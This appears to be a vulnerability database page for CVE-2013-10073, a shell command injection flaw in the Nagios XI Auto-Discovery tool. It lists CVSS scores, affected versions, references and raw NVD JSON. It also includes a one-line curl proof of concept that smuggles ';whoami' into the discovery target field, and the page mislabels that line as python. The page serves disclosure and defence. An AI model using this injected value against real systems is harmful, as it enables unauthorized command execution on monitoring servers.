CVE-2013-10073

Description

Nagios XI versions prior to 2012R1.6 contain a shell command injection vulnerability in the Auto-Discovery tool. User-controlled input is passed to a shell without adequate sanitation or argument quoting, allowing an authenticated user with access to discovery functionality to execute arbitrary commands with the privileges of the application service.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.0:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:nagios:nagios_xi:2012:r1.3:*:*:*:*:*:* - VULNERABLE

Nagios XI < 2012R1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

curl -X POST 'http://target/nagiosxi/includes/discovery/autodiscovery.php' -d 'target=;whoami'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2013-10073
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2013-10073
[3] CVE Details https://www.cvedetails.com/cve/CVE-2013-10073/
[4] VulDB https://vuldb.com/cve/CVE-2013-10073
[5] https://www.nagios.com/changelog/nagios-xi/
[6] https://www.vulncheck.com/advisories/nagios-xi-auto-discovery-shell-command-injection

Raw JSON Data

JSON

{"cve": {"id": "CVE-2013-10073", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:36.367", "lastModified": "2025-11-06T16:24:10.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios XI versions prior to 2012R1.6 contain a shell command injection vulnerability in the Auto-Discovery tool. User-controlled input is passed to a shell without adequate sanitation or argument quoting, allowing an authenticated user with access to discovery functionality to execute arbitrary commands with the privileges of the application service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*", "versionEndExcluding": "2012", "matchCriteriaId": "80AE04CF-7CBB-40D9-816E-A481096AA647"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.0:*:*:*:*:*:*", "matchCriteriaId": "63DC3A03-8CB1-489F-86D2-13F271C2C48D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.1:*:*:*:*:*:*", "matchCriteriaId": "653ED130-C4EC-4EC1-AE81-99BA7F888B33"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.2:*:*:*:*:*:*", "matchCriteriaId": "B28B0CDB-0E18-4702-B498-C89431095C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.3:*:*:*:*:*:*", "matchCriteriaId": "14CF14F0-7115-4AB6-B35F-BDBE298420CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.4:*:*:*:*:*:*", "matchCriteriaId": "5B3E6044-06C2-46B2-92AD-C79C287A0018"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nagios:nagios_xi:2012:r1.5:*:*:*:*:*:*", "matchCriteriaId": "DAED5B87-54DB-4AB2-AB0E-1D75EF1F8C7F"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-xi/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-xi-auto-discovery-shell-command-injection", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}